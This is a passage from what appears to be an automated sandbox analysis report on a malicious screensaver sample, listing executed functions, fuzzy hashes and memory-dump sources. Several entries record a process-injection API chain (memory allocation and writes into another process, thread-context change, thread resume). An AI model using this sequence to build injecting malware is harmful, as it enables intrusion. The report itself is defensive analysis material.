Opcode Fuzzy Hash: f0a55d97cda008e7576dcf22cc24f999d18fe809062c95436ae310a3a2ae0bbd
Instruction Fuzzy Hash: 5261BE2601E3C05FD7138B7098A96923FB1AF27244F0E59EBC0C5CF8A3D228590AD767

Uniqueness

Uniqueness Score: -1.00%

Function 0033C1E4 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0032F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32f000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cbfa0143cdbf85856cfa23a35a16584b9957d944f10a66b1b9a0fe101eae8c6
Instruction ID: c22b0dce44903a32e4d77179703ec0f534a88d819fc50e2e26e6a455818da670
Opcode Fuzzy Hash: 6cbfa0143cdbf85856cfa23a35a16584b9957d944f10a66b1b9a0fe101eae8c6
Instruction Fuzzy Hash: F0218E2602E3C15FD753877098A6A927FB19F17204B0E59DBC0C4CF8E3D219690AD762

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mpoom39002.scrPID: 3216, Parent PID: 2160COMMON

Execution Graph

Execution Coverage:	17%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	40
Total number of Limit Nodes:	1

Executed Functions

Function 001E3908 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001E39E3

Strings

u1, xrefs: 001E3908

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: u1
API String ID: 3559483778-1112514422
Opcode ID: 72fa9813022d79350a9ee7d392e61004efa49417de51a283077d257133ac726f
Instruction ID: 04d08971eaa9c19a3dc220aeb632923f456cdd39d2728a22443be767933804be
Opcode Fuzzy Hash: 72fa9813022d79350a9ee7d392e61004efa49417de51a283077d257133ac726f
Instruction Fuzzy Hash: 8541A9B4D012589FCF00CFAAD984AEEBBF1BB49314F24942AE814B7210D378AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001E4868 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001E4A39

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8d5d59d1997b7ea649565dc5b8932606df8e64c09517433c7e3abd86c036f588
Instruction ID: 5c8c76d07ba80667af83b2046f04fe807b5e9c5f27c194efbdbc961c0dd64d46
Opcode Fuzzy Hash: 8d5d59d1997b7ea649565dc5b8932606df8e64c09517433c7e3abd86c036f588
Instruction Fuzzy Hash: 4C81D074D00269CFDF24CFA5C884BDDBBB5BB49304F1491AAE509B7260DB309A89CF65

Uniqueness

Uniqueness Score: -1.00%

Function 001E3910 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001E39E3

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f9817ce26802ee9458f2e9457436d3219a3e175998f9459cbe3b06752f9488ca
Instruction ID: 700d006f55beefe897a7b10c5ba363212f92ccebe3ba5f90dbd02c8ef40044c2
Opcode Fuzzy Hash: f9817ce26802ee9458f2e9457436d3219a3e175998f9459cbe3b06752f9488ca
Instruction Fuzzy Hash: D841AAB5D012589FCF00CFAAD984AEEFBF1BB49314F24942AE814B7210D774AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 001E3A60 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001E3B12

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e503ac8e2ecd7e615661f845bfb41e17e419ff262b6b20fca29ec55afa9196a
Instruction ID: 39be13704f101526513925399cc9702bdf46616306738eee8d7eee20ca2b3b15
Opcode Fuzzy Hash: 2e503ac8e2ecd7e615661f845bfb41e17e419ff262b6b20fca29ec55afa9196a
Instruction Fuzzy Hash: 5131ABB8D00258DFCF10CFA9D984AEEFBB1BB49310F20952AE825BB250D775A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001E3A68 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001E3B12

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a44739440068e04cf248e3909d2cc488fda9d92b563dba115454ecc6f71f2bae
Instruction ID: f4df26359cb7b499b7bbb9e7be1ffd221268f29f4a351b9ffbf0bda9c4dd21de
Opcode Fuzzy Hash: a44739440068e04cf248e3909d2cc488fda9d92b563dba115454ecc6f71f2bae
Instruction Fuzzy Hash: 5A3188B8D00258DFCF10CFA9D984ADEFBB5BB49310F20942AE815BB210D735AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001E4C98 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001E4D45

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a92e6733b2995979960248a147a9c78db41e38ab8768800f1325738c4c14f22d
Instruction ID: 72c9947c2bbb9797a2cc4d42f0569eb71c264b901d47476b7e0b0e7a80ad621d
Opcode Fuzzy Hash: a92e6733b2995979960248a147a9c78db41e38ab8768800f1325738c4c14f22d
Instruction Fuzzy Hash: 723188B9D00258DFCF10CFAAD984ADEFBB5BB19310F24902AE814B7210D335AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 001E37E8 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001E3897

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4d7826c0bffcc71e17718715206e095df18332dbffdc7b1230f0f196f1131357
Instruction ID: 244d907575c1af0f45109d9ec65f58cc18897c570811e2e2ce005db353b5cbcc
Opcode Fuzzy Hash: 4d7826c0bffcc71e17718715206e095df18332dbffdc7b1230f0f196f1131357
Instruction Fuzzy Hash: C031BBB4D00258DFDB14DFAAD988AEEBBB1BF49314F24842AE414B7250C778AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001E3B88 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 001E3C06

Memory Dump Source

Source File: 00000005.00000002.346310510.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e0000_mpoom39002.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aebaed0b15c4726b0b324bf760ca991b18aa0bd941f9265ab3db4d81f51a3a11
Instruction ID: 0a133334ad388132184163965bb041470bf688a0ea3cc434af8bdcde7ece92e6
Opcode Fuzzy Hash: aebaed0b15c4726b0b324bf760ca991b18aa0bd941f9265ab3db4d81f51a3a11
Instruction Fuzzy Hash: F031CEB4D002489FCB14CFAAD984AEEFBB4AF89310F24942AE814B7310C774A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0012D4CC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.345869052.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12d000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d169fdabf90897cb443ebcaf7dc3937bddae367b3ae683bd2144e0453a49cb
Instruction ID: 7db3c05d82ec6e924cc196d0f030d95878e6ff5d544af38750812ef16742c1f3
Opcode Fuzzy Hash: 11d169fdabf90897cb443ebcaf7dc3937bddae367b3ae683bd2144e0453a49cb
Instruction Fuzzy Hash: 7F21F171504240DFEB099F10F8C4B26BF75FB94328F34C569E8054B246C376D966CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012D4C7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.345869052.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12d000_mpoom39002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
Instruction ID: 9128be4a62ed7a2307a3ac15b4c2ec5e95e72cc80e6fc628e87bcb7ab62881fb
Opcode Fuzzy Hash: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
Instruction Fuzzy Hash: A211D376504280CFDB05CF10E9C4B56BF72FB94314F34C6A9D8094B256C33AD96ACBA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mpoom39002.scrPID: 3248, Parent PID: 3216COMMON

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	46.5%
Total number of Nodes:	258
Total number of Limit Nodes:	4

Executed Functions

Function 001F3B30 Relevance: 1.8, Strings: 1, Instructions: 596
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&55p, xrefs: 001F3C4B

Memory Dump Source

Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd

Similarity

API ID:
String ID: &55p
API String ID: 0-1955183375
Opcode ID: b370cce780b76540c004fb21444e7df7a71b3c101ac6bcd48c54242d55af7706
Instruction ID: d5cb7cc4bbdd1da5edb85e788a8ac0470dce5980a989ed38319291e27c392a7f
Opcode Fuzzy Hash: b370cce780b76540c004fb21444e7df7a71b3c101ac6bcd48c54242d55af7706
Instruction Fuzzy Hash: 12529D74E00228CFDB65DF65C890BADBBB2BF89300F1085EAD509AB255DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001F51C1 Relevance: 1.8, APIs: 1, Instructions: 274
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 001F529C

Memory Dump Source

Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7698a1309ab70c38213df1379255477dd25da9a71a86fb194016699fc2280b41
Instruction ID: 94c2517834f6c86ac4729890d16eb25e1689ebf5bce1f3a103c640323205421c
Opcode Fuzzy Hash: 7698a1309ab70c38213df1379255477dd25da9a71a86fb194016699fc2280b41
Instruction Fuzzy Hash: 59D1D474E00218CFDB14DFA5D994BADBBB2FF89301F1081A9D409AB365DB355A86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FA538 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FA603

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81e57b75de30232c6ebcfe88031cd6919a43bc0751ac2ac5f289f01a52754365
Instruction ID: 968f86a8130317aa96bad22505efe1184834a65bb221cbdd66cfaecebef95708
Opcode Fuzzy Hash: 81e57b75de30232c6ebcfe88031cd6919a43bc0751ac2ac5f289f01a52754365
Instruction Fuzzy Hash: 6AC1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F8228 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F82F3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 920b7a3280a61416f17e23683d419708d74b85e354d3d823ac989e570603e543
Instruction ID: 0c73ccc7c501c88ec9cd1ee792a2cddb21ca5c65b4b7ae36878f8ab8fe370ace
Opcode Fuzzy Hash: 920b7a3280a61416f17e23683d419708d74b85e354d3d823ac989e570603e543
Instruction Fuzzy Hash: 21C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD509AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F4A18 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F4AE3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e439f6a327c1b16521ba333ae888c363e266de6f3b4896ccd44571e784d6f81
Instruction ID: 5680fa8075a8f2ac4125714e18fbcee369bf199a8cd1cc776b4935d26ccabacf
Opcode Fuzzy Hash: 0e439f6a327c1b16521ba333ae888c363e266de6f3b4896ccd44571e784d6f81
Instruction Fuzzy Hash: B6C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F3D10 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F3DDB

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e49c5dfb90d7f4f4041fff9e4bc88b0bc84225592ba1fac4323d628fce02e08a
Instruction ID: aecb2dc34e2fb0a7409dfa14775d6d7852b64852573c11594676e3156ff336e1
Opcode Fuzzy Hash: e49c5dfb90d7f4f4041fff9e4bc88b0bc84225592ba1fac4323d628fce02e08a
Instruction Fuzzy Hash: 90C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D909AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F3008 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F30D3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc7055cecd6afdab383ba53205b3ed13c29d19e6a9937ba6ba15bdb9f257c6a8
Instruction ID: 795382bdfdb565586ec25b995dbdb7a38fc897cf881b0ebcd26e88e1183eae10
Opcode Fuzzy Hash: fc7055cecd6afdab383ba53205b3ed13c29d19e6a9937ba6ba15bdb9f257c6a8
Instruction Fuzzy Hash: A0C1B374E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F9808 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F98D3

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6be54e2a9d83aecb7eb8179cac572edd20e76860d1c1e892d0dbcbeb1d54bb1
Instruction ID: 792ba85ce200328c2baf686db5b5d4e3d6c2ee091d96f728d1bcb7bcda89ab94
Opcode Fuzzy Hash: e6be54e2a9d83aecb7eb8179cac572edd20e76860d1c1e892d0dbcbeb1d54bb1
Instruction Fuzzy Hash: 1DC1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F2300 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F23CB

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b0b07ecf9265a4d620690f9eb3cc3d5e78b5765c7445c5a895b1ca8d4f345ea
Instruction ID: 46c4ed28ab2142d2a19b6fb63b1771330834bcdc16d99b5892f449b19ed389a6
Opcode Fuzzy Hash: 5b0b07ecf9265a4d620690f9eb3cc3d5e78b5765c7445c5a895b1ca8d4f345ea
Instruction Fuzzy Hash: 56C1B374E00218CFDB14DFA5D995BADBBB2BF88300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F8B00 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F8BCB

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26cba2fc8d2b9b2575cd87e3a99205974ee045088a687273f84c494398aff8e2
Instruction ID: 95a90983857429dd7ac7cd8f848879d016fd3d62c852903db2b148ba0defc5c4
Opcode Fuzzy Hash: 26cba2fc8d2b9b2575cd87e3a99205974ee045088a687273f84c494398aff8e2
Instruction Fuzzy Hash: 59C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F4168 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F4233

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5df0a74a019095b3540ae52c698907dc7838549d6bfe0cad6962b54995b7965
Instruction ID: ec5ec3cfc3b440484d2a1f50e3320c10854d5a9701fefab656056b3f54a56546
Opcode Fuzzy Hash: f5df0a74a019095b3540ae52c698907dc7838549d6bfe0cad6962b54995b7965
Instruction Fuzzy Hash: 67C1D374E00218CFDB14DFA5D994BADBBB2BF89300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F9C60 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F9D2B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 16d042ccafe11f681e693b27c8f9a0fd84d67fd7b3da2d7ed9f1d0edca29c37e
Instruction ID: 948ecf10a515f2a435eeb9c338d32ea231ebd629c1875d5f78bc264d0ade391a
Opcode Fuzzy Hash: 16d042ccafe11f681e693b27c8f9a0fd84d67fd7b3da2d7ed9f1d0edca29c37e
Instruction Fuzzy Hash: 32C1B474E00218CFDB14DFA5D994BADBBB2BF88300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F3460 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F352B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85147bf548b153cc86d88376f0c4d331f25582f21fed17807100cc73e87fb465
Instruction ID: af9ced3a39208caf5c5084e75a58f79702ce899aa5bab40ef9495ce04d07a43b
Opcode Fuzzy Hash: 85147bf548b153cc86d88376f0c4d331f25582f21fed17807100cc73e87fb465
Instruction Fuzzy Hash: 9BC1A274E00218CFDB54DFA5D994BADBBB2BF89300F2084A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F2758 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F2823

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 09e6b2baca31bc880c40478ff3c2833b55c04fae58de678d9ab3f2bd9e5e491e
Instruction ID: d0f5db2f7f628a8b3388825f8c9de750a5ff09d276e406415f82fe6775ddad76
Opcode Fuzzy Hash: 09e6b2baca31bc880c40478ff3c2833b55c04fae58de678d9ab3f2bd9e5e491e
Instruction Fuzzy Hash: 55C1A274E00218CFDB54DFA5D994BADBBB2BF88300F2085A9D809AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F8F58 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003F9023

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ae6eddbbd122f50f414259d8e6d29119b20d181d6e453f56def0355ac175e17
Instruction ID: 10f47b951ba816a74e569d0015b8d2cc1ccd4e70a982e29b93b794ae21510f72
Opcode Fuzzy Hash: 7ae6eddbbd122f50f414259d8e6d29119b20d181d6e453f56def0355ac175e17
Instruction Fuzzy Hash: 3BC1B374E00218CFDB54DFA5D994BADBBB2BF88300F2085AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F1A50 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F1B1B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89e11bda14ebc2a1e1f6e89a21850fa2a48691a1ac0c7ad047b34f39fedbd2e3
Instruction ID: a8fa70bba0f5e4865fe40558c1c6096bc94665336b414153c14f938c06c49f9c
Opcode Fuzzy Hash: 89e11bda14ebc2a1e1f6e89a21850fa2a48691a1ac0c7ad047b34f39fedbd2e3
Instruction Fuzzy Hash: 85C1B474E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D809AB365DB355E85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F0D48 Relevance: 1.8, APIs: 1, Instructions: 268
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 003F0E13

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43ff06171d27b4a14d47c730a41185d44658e8b9db2a2467e7edaf6cb5776e70
Instruction ID: 28c7e75ccfdda9a07f8ded53fbe3c5a7d519c0cea071f1823886a5963024ab13
Opcode Fuzzy Hash: 43ff06171d27b4a14d47c730a41185d44658e8b9db2a2467e7edaf6cb5776e70
Instruction Fuzzy Hash: 34C1C374E00218CFDB54DFA5D994BADBBB2BF88300F2084A9D909AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FBF48 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FC013

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e9a79426aa8acfcf2cf8cd029f79838a68489f7140bd22601f2240177354a7c
Instruction ID: 2403ce56b3c1ced990ab15663a453607eb92d84bfcaeb194af6852b634a8e500
Opcode Fuzzy Hash: 4e9a79426aa8acfcf2cf8cd029f79838a68489f7140bd22601f2240177354a7c
Instruction Fuzzy Hash: DAC1B474E00218CFDB54DFA5D994BADBBB2BF89300F2084AAD409AB365DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003FB240 Relevance: 1.8, APIs: 1, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 003FB30B

Memory Dump Source

Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 240c9384179ed6bfe26ace7f327f918e1a6040b32023ac346df40d8f47a4fa71
Instruction ID: 1bc7966053bc0d928b3406265415a8707e530b0b8dcf36decec7bcf539fd96cb
Opcode Fuzzy Hash: 240c9384179ed6bfe26ace7f327f918e1a6040b32023ac346df40d8f47a4fa71
